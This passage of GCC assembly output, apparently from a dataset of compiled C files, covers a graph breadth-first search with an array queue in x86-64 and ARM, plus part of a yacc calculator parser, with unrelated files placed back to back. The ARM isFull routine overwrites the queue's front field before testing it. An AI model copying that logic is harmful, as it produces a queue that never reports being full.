QWORD PTR [rax] mov eax, DWORD PTR -16[rbp] cdqe sal rax, 2 add rax, rdx mov DWORD PTR [rax], 1 mov rax, QWORD PTR -8[rbp] mov rdx, QWORD PTR 8[rax] mov eax, DWORD PTR -16[rbp] cdqe sal rax, 3 add rax, rdx mov rdx, QWORD PTR [rax] mov eax, DWORD PTR -12[rbp] cdqe sal rax, 2 add rax, rdx mov DWORD PTR [rax], 1 nop pop rbp .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE12: .size addEdge, .-addEdge .section .rodata .LC1: .string "start %d ->" .LC2: .string "%d " .text .globl printGraph .type printGraph, @function printGraph: .LFB13: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 sub rsp, 32 mov QWORD PTR -24[rbp], rdi mov DWORD PTR -8[rbp], 0 jmp .L24 .L27: mov eax, DWORD PTR -8[rbp] mov esi, eax lea rdi, .LC1[rip] mov eax, 0 call printf@PLT mov DWORD PTR -4[rbp], 0 jmp .L25 .L26: mov rax, QWORD PTR -24[rbp] mov rdx, QWORD PTR 8[rax] mov eax, DWORD PTR -8[rbp] cdqe sal rax, 3 add rax, rdx mov rdx, QWORD PTR [rax] mov eax, DWORD PTR -4[rbp] cdqe sal rax, 2 add rax, rdx mov eax, DWORD PTR [rax] mov esi, eax lea rdi, .LC2[rip] mov eax, 0 call printf@PLT add DWORD PTR -4[rbp], 1 .L25: mov rax, QWORD PTR -24[rbp] mov eax, DWORD PTR [rax] cmp DWORD PTR -4[rbp], eax jl .L26 mov edi, 10 call putchar@PLT add DWORD PTR -8[rbp], 1 .L24: mov rax, QWORD PTR -24[rbp] mov eax, DWORD PTR [rax] cmp DWORD PTR -8[rbp], eax jl .L27 nop nop leave .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE13: .size printGraph, .-printGraph .section .rodata .LC3: .string "%d visited \n" .text .globl BFS .type BFS, @function BFS: .LFB14: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 sub rsp, 32 mov QWORD PTR -24[rbp], rdi mov DWORD PTR -28[rbp], esi mov eax, 0 call createQueue mov QWORD PTR -8[rbp], rax mov DWORD PTR -12[rbp], 0 mov edx, DWORD PTR -28[rbp] mov rax, QWORD PTR -8[rbp] mov esi, edx mov rdi, rax call enQueue mov eax, DWORD PTR -28[rbp] mov esi, eax lea rdi, .LC3[rip] mov eax, 0 call printf@PLT jmp .L29 .L33: mov rax, QWORD PTR -8[rbp] mov rdi, rax call deQueue mov DWORD PTR -28[rbp], eax mov eax, DWORD PTR -28[rbp] mov DWORD PTR -12[rbp], eax jmp .L30 .L32: mov rax, QWORD PTR -24[rbp] mov rdx, QWORD PTR 16[rax] mov eax, DWORD PTR -12[rbp] cdqe sal rax, 2 add rax, rdx mov eax, DWORD PTR [rax] test eax, eax jne .L31 mov rax, QWORD PTR -24[rbp] mov rdx, QWORD PTR 8[rax] mov eax, DWORD PTR -28[rbp] cdqe sal rax, 3 add rax, rdx mov rdx, QWORD PTR [rax] mov eax, DWORD PTR -12[rbp] cdqe sal rax, 2 add rax, rdx mov eax, DWORD PTR [rax] cmp eax, 1 jne .L31 mov rax, QWORD PTR -24[rbp] mov rdx, QWORD PTR 16[rax] mov eax, DWORD PTR -12[rbp] cdqe sal rax, 2 add rax, rdx mov DWORD PTR [rax], 1 mov edx, DWORD PTR -12[rbp] mov rax, QWORD PTR -8[rbp] mov esi, edx mov rdi, rax call enQueue mov eax, DWORD PTR -12[rbp] mov esi, eax lea rdi, .LC3[rip] mov eax, 0 call printf@PLT .L31: add DWORD PTR -12[rbp], 1 .L30: mov rax, QWORD PTR -24[rbp] mov eax, DWORD PTR [rax] cmp DWORD PTR -12[rbp], eax jl .L32 .L29: mov rax, QWORD PTR -8[rbp] mov rdi, rax call isEmpty test eax, eax je .L33 nop nop leave .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE14: .size BFS, .-BFS .globl main .type main, @function main: .LFB15: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 sub rsp, 16 mov edi, 4 call makeGraph mov QWORD PTR -8[rbp], rax mov rax, QWORD PTR -8[rbp] mov edx, 1 mov esi, 0 mov rdi, rax call addEdge mov rax, QWORD PTR -8[rbp] mov edx, 2 mov esi, 0 mov rdi, rax call addEdge mov rax, QWORD PTR -8[rbp] mov edx, 2 mov esi, 1 mov rdi, rax call addEdge mov rax, QWORD PTR -8[rbp] mov edx, 0 mov esi, 2 mov rdi, rax call addEdge mov rax, QWORD PTR -8[rbp] mov edx, 3 mov esi, 2 mov rdi, rax call addEdge mov rax, QWORD PTR -8[rbp] mov edx, 3 mov esi, 3 mov rdi, rax call addEdge mov rax, QWORD PTR -8[rbp] mov rdi, rax call printGraph mov rax, QWORD PTR -8[rbp] mov esi, 0 mov rdi, rax call BFS mov eax, 0 leave .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE15: .size main, .-main .ident "GCC: (Ubuntu 10.5.0-1ubuntu1~20.04) 10.5.0" .section .note.GNU-stack,"",@progbits .section .note.gnu.property,"a" .align 8 .long 1f - 0f .long 4f - 1f .long 5 0: .string "GNU" 1: .align 8 .long 0xc0000002 .long 3f - 2f 2: .long 0x3 3: .align 8 4:
.arch armv5t .eabi_attribute 20, 1 .eabi_attribute 21, 1 .eabi_attribute 23, 3 .eabi_attribute 24, 1 .eabi_attribute 25, 1 .eabi_attribute 26, 2 .eabi_attribute 30, 6 .eabi_attribute 34, 0 .eabi_attribute 18, 4 .file "609340.c" .text .align 2 .global createQueue .syntax unified .arm .fpu softvfp .type createQueue, %function createQueue: @ args = 0, pretend = 0, frame = 8 @ frame_needed = 1, uses_anonymous_args = 0 push {fp, lr} add fp, sp, #4 sub sp, sp, #8 mov r0, #208 bl malloc mov r3, r0 str r3, [fp, #-8] ldr r3, [fp, #-8] mvn r2, #0 str r2, [r3, #200] ldr r3, [fp, #-8] mvn r2, #0 str r2, [r3, #204] ldr r3, [fp, #-8] mov r0, r3 sub sp, fp, #4 @ sp needed pop {fp, pc} .size createQueue, .-createQueue .align 2 .global isFull .syntax unified .arm .fpu softvfp .type isFull, %function isFull: @ args = 0, pretend = 0, frame = 8 @ frame_needed = 1, uses_anonymous_args = 0 @ link register save eliminated. str fp, [sp, #-4]! add fp, sp, #0 sub sp, sp, #12 str r0, [fp, #-8] ldr r3, [fp, #-8] mov r2, #0 str r2, [r3, #200] ldr r3, [fp, #-8] ldr r3, [r3, #200] cmp r3, #0 beq .L4 mov r3, #1 b .L5 .L4: mov r3, #0 .L5: mov r0, r3 add sp, fp, #0 @ sp needed ldr fp, [sp], #4 bx lr .size isFull, .-isFull .align 2 .global isEmpty .syntax unified .arm .fpu softvfp .type isEmpty, %function isEmpty: @ args = 0, pretend = 0, frame = 8 @ frame_needed = 1, uses_anonymous_args = 0 @ link register save eliminated. str fp, [sp, #-4]! add fp, sp, #0 sub sp, sp, #12 str r0, [fp, #-8] ldr r3, [fp, #-8] ldr r3, [r3, #204] cmn r3, #1 bne .L7 mov r3, #1 b .L8 .L7: mov r3, #0 .L8: mov r0, r3 add sp, fp, #0 @ sp needed ldr fp, [sp], #4 bx lr .size isEmpty, .-isEmpty .align 2 .global enQueue .syntax unified .arm .fpu softvfp .type enQueue, %function enQueue: @ args = 0, pretend = 0, frame = 8 @ frame_needed = 1, uses_anonymous_args = 0 push {fp, lr} add fp, sp, #4 sub sp, sp, #8 str r0, [fp, #-8] str r1, [fp, #-12] ldr r0, [fp, #-8] bl isFull mov r3, r0 cmp r3, #0 bne .L13 ldr r3, [fp, #-8] ldr r3, [r3, #200] cmn r3, #1 bne .L12 ldr r3, [fp, #-8] mov r2, #0 str r2, [r3, #200] .L12: ldr r3, [fp, #-8] ldr r3, [r3, #204] add r2, r3, #1 ldr r3, [fp, #-8] str r2, [r3, #204] ldr r3, [fp, #-8] ldr r2, [r3, #204] ldr r3, [fp, #-8] ldr r1, [fp, #-12] str r1, [r3, r2, lsl #2] b .L9 .L13: nop .L9: sub sp, fp, #4 @ sp needed pop {fp, pc} .size enQueue, .-enQueue .section .rodata .align 2 .LC0: .ascii "Dequeue : %d\012\000" .text .align 2 .global deQueue .syntax unified .arm .fpu softvfp .type deQueue, %function deQueue: @ args = 0, pretend = 0, frame = 16 @ frame_needed = 1, uses_anonymous_args = 0 push {fp, lr} add fp, sp, #4 sub sp, sp, #16 str r0, [fp, #-16] mov r3, #0 str r3, [fp, #-8] ldr r0, [fp, #-16] bl isEmpty mov r3, r0 cmp r3, #0 beq .L15 mov r3, #1 b .L16 .L15: ldr r3, [fp, #-16] ldr r2, [r3, #200] ldr r3, [fp, #-16] ldr r3, [r3, #204] cmp r2, r3 blt .L17 ldr r3, [fp, #-16] mvn r2, #0 str r2, [r3, #200] ldr r3, [fp, #-16] mvn r2, #0 str r2, [r3, #204] .L17: ldr r3, [fp, #-16] ldr r2, [r3, #200] ldr r3, [fp, #-16] ldr r3, [r3, r2, lsl #2] str r3, [fp, #-8] ldr r3, [fp, #-16] ldr r3, [r3, #200] add r2, r3, #1 ldr r3, [fp, #-16] str r2, [r3, #200] ldr r1, [fp, #-8] ldr r0, .L18 bl printf ldr r3, [fp, #-8] .L16: mov r0, r3 sub sp, fp, #4 @ sp needed pop {fp, pc} .L19: .align 2 .L18: .word .LC0 .size deQueue, .-deQueue .align 2 .global makeGraph .syntax unified .arm .fpu softvfp .type makeGraph, %function makeGraph: @ args = 0, pretend = 0, frame = 16 @ frame_needed = 1, uses_anonymous_args = 0 push {r4, fp, lr} add fp, sp, #8 sub sp, sp, #20 str r0, [fp, #-24] mov r3, #0 str r3, [fp, #-20] ldr r2, [fp, #-24] mov r3, r2 lsl r3, r3, #1 add r3, r3, r2 lsl r3, r3, #2 mov r0, r3 bl malloc mov r3, r0 str r3, [fp, #-16] ldr r3, [fp, #-24] lsl r3, r3, #2 mov r0, r3 bl malloc mov r3, r0 mov r2, r3 ldr r3, [fp, #-16] str r2, [r3, #4] ldr r3, [fp, #-24] lsl r3, r3, #2 mov r0, r3 bl malloc mov r3, r0 mov r2, r3 ldr r3, [fp, #-16] str r2, [r3, #8] ldr r3, [fp, #-16] ldr r2, [fp, #-24] str r2, [r3] mov r3, #0 str r3, [fp, #-20] b .L21 .L22: ldr r3, [fp, #-24] lsl r1, r3, #2 ldr r3, [fp, #-16] ldr r2, [r3, #4] ldr r3, [fp, #-20] lsl r3, r3, #2 add r4, r2, r3 mov r0, r1 bl malloc mov r3, r0 str r3, [r4] ldr r3, [fp, #-16] ldr r2, [r3, #4] ldr r3, [fp, #-20] lsl r3, r3, #2 add r3, r2, r3 ldr r0, [r3] ldr r3, [fp, #-24] lsl r3, r3, #2 mov r2, r3 mov r1, #0 bl memset ldr r3, [fp, #-16] ldr r2, [r3, #8] ldr r3, [fp, #-20] lsl r3, r3, #2 add r3, r2, r3 mov r2, #0 str r2, [r3] ldr r3, [fp, #-20] add r3, r3, #1 str r3, [fp, #-20] .L21: ldr r2, [fp, #-20] ldr r3, [fp, #-24] cmp r2, r3 blt .L22 ldr r3, [fp, #-16] mov r0, r3 sub sp, fp, #8 @ sp needed pop {r4, fp, pc} .size makeGraph, .-makeGraph .align 2 .global addEdge .syntax unified .arm .fpu softvfp .type addEdge, %function addEdge: @ args = 0, pretend = 0, frame = 16 @ frame_needed = 1, uses_anonymous_args = 0 @ link register save eliminated. str fp, [sp, #-4]! add fp, sp, #0 sub sp, sp, #20 str r0, [fp, #-8] str r1, [fp, #-12] str r2, [fp, #-16] ldr r3, [fp, #-8] ldr r2, [r3, #4] ldr r3, [fp, #-12] lsl r3, r3, #2 add r3, r2, r3 ldr r2, [r3] ldr r3, [fp, #-16] lsl r3, r3, #2 add r3, r2, r3 mov r2, #1 str r2, [r3] ldr r3, [fp, #-8] ldr r2, [r3, #4] ldr r3, [fp, #-16] lsl r3, r3, #2 add r3, r2, r3 ldr r2, [r3] ldr r3, [fp, #-12] lsl r3, r3, #2 add r3, r2, r3 mov r2, #1 str r2, [r3] nop add sp, fp, #0 @ sp needed ldr fp, [sp], #4 bx lr .size addEdge, .-addEdge .section .rodata .align 2 .LC1: .ascii "start %d ->\000" .align 2 .LC2: .ascii "%d \000" .text .align 2 .global printGraph .syntax unified .arm .fpu softvfp .type printGraph, %function printGraph: @ args = 0, pretend = 0, frame = 16 @ frame_needed = 1, uses_anonymous_args = 0 push {fp, lr} add fp, sp, #4 sub sp, sp, #16 str r0, [fp, #-16] mov r3, #0 str r3, [fp, #-12] b .L26 .L29: ldr r1, [fp, #-12] ldr r0, .L30 bl printf mov r3, #0 str r3, [fp, #-8] b .L27 .L28: ldr r3, [fp, #-16] ldr r2, [r3, #4] ldr r3, [fp, #-12] lsl r3, r3, #2 add r3, r2, r3 ldr r2, [r3] ldr r3, [fp, #-8] lsl r3, r3, #2 add r3, r2, r3 ldr r3, [r3] mov r1, r3 ldr r0, .L30+4 bl printf ldr r3, [fp, #-8] add r3, r3, #1 str r3, [fp, #-8] .L27: ldr r3, [fp, #-16] ldr r3, [r3] ldr r2, [fp, #-8] cmp r2, r3 blt .L28 mov r0, #10 bl putchar ldr r3, [fp, #-12] add r3, r3, #1 str r3, [fp, #-12] .L26: ldr r3, [fp, #-16] ldr r3, [r3] ldr r2, [fp, #-12] cmp r2, r3 blt .L29 nop nop sub sp, fp, #4 @ sp needed pop {fp, pc} .L31: .align 2 .L30: .word .LC1 .word .LC2 .size printGraph, .-printGraph .section .rodata .align 2 .LC3: .ascii "%d visited \012\000" .text .align 2 .global BFS .syntax unified .arm .fpu softvfp .type BFS, %function BFS: @ args = 0, pretend = 0, frame = 16 @ frame_needed = 1, uses_anonymous_args = 0 push {fp, lr} add fp, sp, #4 sub sp, sp, #16 str r0, [fp, #-16] str r1, [fp, #-20] bl createQueue str r0, [fp, #-8] mov r3, #0 str r3, [fp, #-12] ldr r1, [fp, #-20] ldr r0, [fp, #-8] bl enQueue ldr r1, [fp, #-20] ldr r0, .L38 bl printf b .L33 .L37: ldr r0, [fp, #-8] bl deQueue str r0, [fp, #-20] ldr r3, [fp, #-20] str r3, [fp, #-12] b .L34 .L36: ldr r3, [fp, #-16] ldr r2, [r3, #8] ldr r3, [fp, #-12] lsl r3, r3, #2 add r3, r2, r3 ldr r3, [r3] cmp r3, #0 bne .L35 ldr r3, [fp, #-16] ldr r2, [r3, #4] ldr r3, [fp, #-20] lsl r3, r3, #2 add r3, r2, r3 ldr r2, [r3] ldr r3, [fp, #-12] lsl r3, r3, #2 add r3, r2, r3 ldr r3, [r3] cmp r3, #1 bne .L35 ldr r3, [fp, #-16] ldr r2, [r3, #8] ldr r3, [fp, #-12] lsl r3, r3, #2 add r3, r2, r3 mov r2, #1 str r2, [r3] ldr r1, [fp, #-12] ldr r0, [fp, #-8] bl enQueue ldr r1, [fp, #-12] ldr r0, .L38 bl printf .L35: ldr r3, [fp, #-12] add r3, r3, #1 str r3, [fp, #-12] .L34: ldr r3, [fp, #-16] ldr r3, [r3] ldr r2, [fp, #-12] cmp r2, r3 blt .L36 .L33: ldr r0, [fp, #-8] bl isEmpty mov r3, r0 cmp r3, #0 beq .L37 nop nop sub sp, fp, #4 @ sp needed pop {fp, pc} .L39: .align 2 .L38: .word .LC3 .size BFS, .-BFS .align 2 .global main .syntax unified .arm .fpu softvfp .type main, %function main: @ args = 0, pretend = 0, frame = 8 @ frame_needed = 1, uses_anonymous_args = 0 push {fp, lr} add fp, sp, #4 sub sp, sp, #8 mov r0, #4 bl makeGraph str r0, [fp, #-8] mov r2, #1 mov r1, #0 ldr r0, [fp, #-8] bl addEdge mov r2, #2 mov r1, #0 ldr r0, [fp, #-8] bl addEdge mov r2, #2 mov r1, #1 ldr r0, [fp, #-8] bl addEdge mov r2, #0 mov r1, #2 ldr r0, [fp, #-8] bl addEdge mov r2, #3 mov r1, #2 ldr r0, [fp, #-8] bl addEdge mov r2, #3 mov r1, #3 ldr r0, [fp, #-8] bl addEdge ldr r0, [fp, #-8] bl printGraph mov r1, #0 ldr r0, [fp, #-8] bl BFS mov r3, #0 mov r0, r3 sub sp, fp, #4 @ sp needed pop {fp, pc} .size main, .-main .ident "GCC: (Ubuntu 9.4.0-1ubuntu1~20.04.2) 9.4.0" .section .note.GNU-stack,"",%progbits
.file "449112.c" .intel_syntax noprefix .text .ident "GCC: (Ubuntu 10.5.0-1ubuntu1~20.04) 10.5.0" .section .note.GNU-stack,"",@progbits .section .note.gnu.property,"a" .align 8 .long 1f - 0f .long 4f - 1f .long 5 0: .string "GNU" 1: .align 8 .long 0xc0000002 .long 3f - 2f 2: .long 0x3 3: .align 8 4:
.arch armv5t .eabi_attribute 20, 1 .eabi_attribute 21, 1 .eabi_attribute 23, 3 .eabi_attribute 24, 1 .eabi_attribute 25, 1 .eabi_attribute 26, 2 .eabi_attribute 30, 6 .eabi_attribute 34, 0 .eabi_attribute 18, 4 .file "449112.c" .text .ident "GCC: (Ubuntu 9.4.0-1ubuntu1~20.04.2) 9.4.0" .section .note.GNU-stack,"",%progbits
.file "348587.c" .intel_syntax noprefix .text .section .rodata .align 32 .type calc2_lhs, @object .size calc2_lhs, 38 calc2_lhs: .value -1 .value 0 .value 0 .value 0 .value 1 .value 1 .value 2 .value 2 .value 2 .value 2 .value 2 .value 2 .value 2 .value 2 .value 2 .value 2 .value 2 .value 3 .value 3 .align 32 .type calc2_len, @object .size calc2_len, 38 calc2_len: .value 2 .value 0 .value 3 .value 3 .value 1 .value 3 .value 3 .value 3 .value 3 .value 3 .value 3 .value 3 .value 3 .value 3 .value 2 .value 1 .value 1 .value 1 .value 2 .align 32 .type calc2_defred, @object .size calc2_defred, 66 calc2_defred: .value 1 .value 0 .value 0 .value 17 .value 0 .value 0 .value 0 .value 0 .value 0 .value 0 .value 3 .value 0 .value 15 .value 14 .value 0 .value 2 .value 0 .value 0 .value 0 .value 0 .value 0 .value 0 .value 0 .value 18 .value 0 .value 6 .value 0 .value 0 .value 0 .value 0 .value 9 .value 10 .value 11 .align 8 .type calc2_dgoto, @object .size calc2_dgoto, 8 calc2_dgoto: .value 1 .value 7 .value 8 .value 9 .align 32 .type calc2_sindex, @object .size calc2_sindex, 66 calc2_sindex: .value 0 .value -40 .value -7 .value 0 .value -55 .value -38 .value -38 .value 1 .value -29 .value -247 .value 0 .value -38 .value 0 .value 0 .value 22 .value 0 .value -38 .value -38 .value -38 .value -38 .value -38 .value -38 .value -38 .value 0 .value -29 .value 0 .value 51 .value 60 .value -20 .value -20 .value 0 .value 0 .value 0 .align 32 .type calc2_rindex, @object .size calc2_rindex, 66 calc2_rindex: .value 0 .value 0 .value 0 .value 0 .value 2 .value 0 .value 0 .value 0 .value 9 .value -9 .value 0 .value 0 .value 0 .value 0 .value 0 .value 0 .value 0 .value 0 .value 0 .value 0 .value 0 .value 0 .value 0 .value 0 .value 10 .value 0 .value -6 .value 14 .value 5 .value 13 .value 0 .value 0 .value 0 .align 8 .type calc2_gindex, @object .size calc2_gindex, 8 calc2_gindex: .value 0 .value 0 .value 65 .value 0 .align 32 .type calc2_table, @object .size calc2_table, 442 calc2_table: .value 6 .value 16 .value 6 .value 10 .value 13 .value 5 .value 11 .value 5 .value 22 .value 17 .value 23 .value 15 .value 15 .value 20 .value 18 .value 7 .value 19 .value 22 .value 21 .value 4 .value 5 .value 0 .value 20 .value 8 .value 12 .value 0 .value 0 .value 21 .value 16 .value 16 .value 0 .value 0 .value 16 .value 16 .value 16 .value 13 .value 16 .value 0 .value 16 .value 15 .value 15 .value 0 .value 0 .value 7 .value 15 .value 15 .value 7 .value 15 .value 7 .value 15 .value 7 .value 8 .value 12 .value 0 .value 8 .value 12 .value 8 .value 0 .value 8 .value 22 .value 17 .value 0 .value 0 .value 25 .value 20 .value 18 .value 0 .value 19 .value 0 .value 21 .value 13 .value 14 .value 0 .value 0 .value 0 .value 0 .value 24 .value 0 .value 0 .value 0 .value 0 .value 26 .value 27 .value 28 .value 29 .value 30 .value 31 .value 32 .value 22 .value 17 .value 0 .value 0 .value 0 .value 20 .value 18 .value 16 .value 19 .value 22 .value 21 .value 0 .value 0 .value 0 .value 20 .value 18 .value 0 .value 19 .value 0 .value 21 .value 0 .value 0 .value 0 .value 0 .value 0 .value 0 .value 0 .value 16 .value 0 .value 0 .value 13 .value 0 .value 0 .value 0 .value 0 .value 0 .value 0 .value 0 .value 15 .value 0 .value 0 .value 7 .value 0 .value 0 .value 0 .value 0 .value 0 .value 0 .value 0 .value 8 .value 12 .value 0 .value 0 .value 0 .value 0 .value 0 .value 0 .value 0 .value 16 .value 0 .value 0 .value 0 .value 0 .value 0 .value 0 .value 0 .value 0 .value 0 .value 0 .value 0 .value 0 .value 0 .value 0 .value 0 .value 0 .value 0 .value 0 .value 0 .value 0 .value 0 .value 0 .value 0 .value 0 .value 0 .value 0 .value 0 .value 0 .value 0 .value 0 .value 0 .value 0 .value 0 .value 0 .value 0 .value 0 .value 0 .value 0 .value 0 .value 0 .value 0 .value 0 .value 0 .value 0 .value 0 .value 0 .value 0 .value 0 .value 0 .value 0 .value 0 .value 0 .value 0 .value 0 .value 0 .value 0 .value 0 .value 0 .value 0 .value 0 .value 0 .value 0 .value 0 .value 0 .value 0 .value 0 .value 0 .value 0 .value 0 .value 2 .value 3 .value 4 .value 3 .value 12 .align 32 .type calc2_check, @object .size calc2_check, 442 calc2_check: .value 40 .value 10 .value 40 .value 10 .value 10 .value 45 .value 61 .value 45 .value 37 .value 38 .value 257 .value 10 .value 10 .value 42 .value 43 .value 10 .value 45 .value 37 .value 47 .value 10 .value 10 .value -1 .value 42 .value 10 .value 10 .value -1 .value -1 .value 47 .value 37 .value 38 .value -1 .value -1 .value 41 .value 42 .value 43 .value 41 .value 45 .value -1 .value 47 .value 37 .value 38 .value -1 .value -1 .value 38 .value 42 .value 43 .value 41 .value 45 .value 43 .value 47 .value 45 .value 38 .value 38 .value -1 .value 41 .value 41 .value 43 .value -1 .value 45 .value 37 .value 38 .value -1 .value -1 .value 41 .value 42 .value 43 .value -1 .value 45 .value -1 .value 47 .value 5 .value 6 .value -1 .value -1 .value -1 .value -1 .value 11 .value -1 .value -1 .value -1 .value -1 .value 16 .value 17 .value 18 .value 19 .value 20 .value 21 .value 22 .value 37 .value 38 .value -1 .value -1 .value -1 .value 42 .value 43 .value 124 .value 45 .value 37 .value 47 .value -1 .value -1 .value -1 .value 42 .value 43 .value -1 .value 45 .value -1 .value 47 .value -1 .value -1 .value -1 .value -1 .value -1 .value -1 .value -1 .value 124 .value -1 .value -1 .value 124 .value -1 .value -1 .value -1 .value -1 .value -1 .value -1 .value -1 .value 124 .value -1 .value -1 .value 124 .value -1 .value -1 .value -1 .value -1 .value -1 .value -1 .value -1 .value 124 .value 124 .value -1 .value -1 .value -1 .value -1 .value -1 .value -1 .value -1 .value 124 .value -1 .value -1 .value -1 .value -1 .value -1 .value -1 .value -1 .value -1 .value -1 .value -1 .value -1 .value -1 .value -1 .value -1 .value -1 .value -1 .value -1 .value -1 .value -1 .value -1 .value -1 .value -1 .value -1 .value -1 .value -1 .value -1 .value -1 .value -1 .value -1 .value -1 .value -1 .value -1 .value -1 .value -1 .value -1 .value -1 .value -1 .value -1 .value -1 .value -1 .value -1 .value -1 .value -1 .value -1 .value -1 .value -1 .value -1 .value -1 .value -1 .value -1 .value -1 .value -1 .value -1 .value -1 .value -1 .value -1 .value -1 .value -1 .value -1 .value -1 .value -1 .value -1 .value -1 .value -1 .value -1 .value -1 .value -1 .value -1 .value -1 .value 256 .value 257 .value 258 .value 257 .value 258 .globl calc2_errflag .bss .align 4 .type calc2_errflag, @object .size calc2_errflag, 4 calc2_errflag: .zero 4 .globl calc2_char .align 4 .type calc2_char, @object .size calc2_char, 4 calc2_char: .zero 4 .globl calc2_val .align 4 .type calc2_val, @object .size calc2_val, 4 calc2_val: .zero 4 .globl calc2_lval .align 4 .type calc2_lval, @object .size calc2_lval, 4 calc2_lval: .zero 4 .globl calc2_nerrs .align 4 .type calc2_nerrs, @object .size calc2_nerrs, 4 calc2_nerrs: .zero 4 .local yystack .comm yystack,48,32 .text .globl main .type main, @function main: .LFB0: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 add rsp, -128 mov rax, QWORD PTR fs:40 mov QWORD PTR -8[rbp], rax xor eax, eax mov DWORD PTR -116[rbp], 10 jmp .L2 .L3: lea rdx, -116[rbp] lea rax, -112[rbp] mov rsi, rdx mov rdi, rax call calc2_parse .L2: mov rax, QWORD PTR stdin[rip] mov rdi, rax call feof@PLT test eax, eax je .L3 mov eax, 0 mov rcx, QWORD PTR -8[rbp] sub rcx, QWORD PTR fs:40 je .L5 call __stack_chk_fail@PLT .L5: leave .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE0: .size main, .-main .section .rodata .LC0: .string "%s\n" .text .type calc2_error, @function calc2_error: .LFB1: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 sub rsp, 32 mov QWORD PTR -8[rbp], rdi mov QWORD PTR -16[rbp], rsi mov QWORD PTR -24[rbp], rdx mov rax, QWORD PTR stderr[rip] mov rdx, QWORD PTR -24[rbp] lea rsi, .LC0[rip] mov rdi, rax mov eax, 0 call fprintf@PLT nop leave .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE1: .size calc2_error, .-calc2_error .globl calc2_lex .type calc2_lex, @function calc2_lex: .LFB2: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 sub rsp, 32 mov QWORD PTR -24[rbp], rdi nop .L8: call getchar@PLT mov DWORD PTR -4[rbp], eax cmp DWORD PTR -4[rbp], 32 je .L8 call __ctype_b_loc@PLT mov rdx, QWORD PTR [rax] mov eax, DWORD PTR -4[rbp] cdqe add rax, rax add rax, rdx movzx eax, WORD PTR [rax] movzx eax, ax and eax, 512 test eax, eax je .L9 mov eax, DWORD PTR -4[rbp] sub eax, 97 mov DWORD PTR calc2_lval[rip], eax mov eax, 258 jmp .L10 .L9: call __ctype_b_loc@PLT mov rdx, QWORD PTR [rax] mov eax, DWORD PTR -4[rbp] cdqe add rax, rax add rax, rdx movzx eax, WORD PTR [rax] movzx eax, ax and eax, 2048 test eax, eax je .L11 mov eax, DWORD PTR -4[rbp] lea edx, -48[rax] mov rax, QWORD PTR -24[rbp] mov ecx, DWORD PTR [rax] mov eax, edx cdq idiv ecx mov eax, edx mov DWORD PTR calc2_lval[rip], eax mov eax, 257 jmp .L10 .L11: mov eax, DWORD PTR -4[rbp] .L10: leave .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE2: .size calc2_lex, .-calc2_lex .type yygrowstack, @function yygrowstack: .LFB9: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 sub rsp, 48 mov QWORD PTR -40[rbp], rdi mov rax, QWORD PTR -40[rbp] mov eax, DWORD PTR [rax] mov DWORD PTR -24[rbp], eax cmp DWORD PTR -24[rbp], 0 jne .L13 mov DWORD PTR -24[rbp], 200 jmp .L14 .L13: cmp DWORD PTR -24[rbp], 9999 jbe .L15 mov eax, -2 jmp .L16 .L15: sal DWORD PTR -24[rbp] cmp DWORD PTR -24[rbp], 10000 jbe .L14 mov DWORD PTR -24[rbp], 10000 .L14: mov rax, QWORD PTR -40[rbp] mov rdx, QWORD PTR 16[rax] mov rax, QWORD PTR -40[rbp] mov rcx, QWORD PTR 8[rax] mov rax, rdx sub rax, rcx sar rax mov DWORD PTR -20[rbp], eax mov eax, DWORD PTR -24[rbp] lea rdx, [rax+rax] mov rax, QWORD PTR -40[rbp] mov rax, QWORD PTR 8[rax] mov rsi, rdx mov rdi, rax call realloc@PLT mov QWORD PTR -16[rbp], rax cmp QWORD PTR -16[rbp], 0 jne .L17 mov eax, -2 jmp .L16 .L17: mov rax, QWORD PTR -40[rbp] mov rdx, QWORD PTR -16[rbp] mov QWORD PTR 8[rax], rdx mov eax, DWORD PTR -20[rbp] cdqe lea rdx, [rax+rax] mov rax, QWORD PTR -16[rbp] add rdx, rax mov rax, QWORD PTR -40[rbp] mov QWORD PTR 16[rax], rdx mov eax, DWORD PTR -24[rbp] lea rdx, 0[0+rax*4] mov rax, QWORD PTR -40[rbp] mov rax, QWORD PTR 32[rax] mov rsi, rdx mov rdi, rax call realloc@PLT mov QWORD PTR -8[rbp], rax cmp QWORD PTR -8[rbp], 0 jne .L18 mov eax, -2 jmp .L16 .L18: mov rax, QWORD PTR -40[rbp] mov rdx, QWORD PTR -8[rbp] mov QWORD PTR 32[rax], rdx mov eax, DWORD PTR -20[rbp] cdqe lea rdx, 0[0+rax*4] mov rax, QWORD PTR -8[rbp] add rdx, rax mov rax, QWORD PTR -40[rbp] mov QWORD PTR 40[rax], rdx mov rax, QWORD PTR -40[rbp] mov edx, DWORD PTR -24[rbp] mov DWORD PTR [rax], edx mov rax, QWORD PTR -40[rbp] mov rdx, QWORD PTR 8[rax] mov eax, DWORD PTR -24[rbp] add rax, rax sub rax, 2 add rdx, rax mov rax, QWORD PTR -40[rbp] mov QWORD PTR 24[rax], rdx mov eax, 0 .L16: leave .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE9: .size yygrowstack, .-yygrowstack .section .rodata .LC1: .string "syntax error" .LC2: .string "%d\n" .LC3: .string "yacc stack overflow" .text .globl calc2_parse .type calc2_parse, @function calc2_parse: 